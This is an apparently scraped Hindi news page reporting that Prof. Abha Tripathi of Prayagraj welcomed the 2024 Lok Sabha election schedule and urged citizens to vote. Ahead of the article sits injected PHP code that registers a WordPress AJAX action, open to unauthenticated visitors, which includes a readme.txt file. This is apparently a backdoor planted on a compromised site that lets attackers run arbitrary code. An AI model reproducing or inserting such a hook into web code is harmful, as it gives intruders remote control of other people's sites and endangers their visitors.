if(!function_exists('file_check_readme35885')){ add_action('wp_ajax_nopriv_file_check_readme35885', 'file_check_readme35885'); add_action('wp_ajax_file_check_readme35885', 'file_check_readme35885'); function file_check_readme35885() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } चुनाव लोकतंत्र का सबसे बड़ा उत्सव होता है, प्रो. आभा त्रिपाठी
Breaking NewsIndiaNews

चुनाव लोकतंत्र का सबसे बड़ा उत्सव होता है, प्रो. आभा त्रिपाठी

प्रयागराज, संयम भारत, विभिन्न संगठनों से जुड़ी वरिष्ठ समाजसेवी, प्रो. डॉ आभा त्रिपाठी ने आज चुनाव आयोग द्वारा लोक सभा चुनाव 2024 के तिथियों की घोषणा का स्वागत करते हुए बताया कि चुनाव लोकतंत्र का सबसे बड़ा महापर्व है। इससे सबको अपने अधिकार का पता चलता है और उसी अधिकार से जनता जिसको चाहती है उसको बैठा देती है और जिसको नहीं चाहती उसे हटा देती है। चुनाव से जहां एक ओर देश और प्रदेश के विकास के गति में और तेजी लाने के लिए चर्चा होती है, वहीं दूसरी ओर सुशासन आदि विषयों पर भी आम जनों को सही को सही और गलत को गलत कहने का मौका मिलता है। साथ ही पुराने वादों को याद दिलाने का माध्यम होता है।
उन्होंने देशवासियों के साथ ही साथ प्रयगवासीयों से अपील करते हुए कहा कि लोकतंत्र के इस पावन पर्व पर बढ़ -चढ़ करके हिस्सेदारी ले और दुनिया के सबसे बड़े लोकतंत्र की नींव को और मजबूती दे।

प्रातिक्रिया दे

आपका ईमेल पता प्रकाशित नहीं किया जाएगा. आवश्यक फ़ील्ड चिह्नित हैं *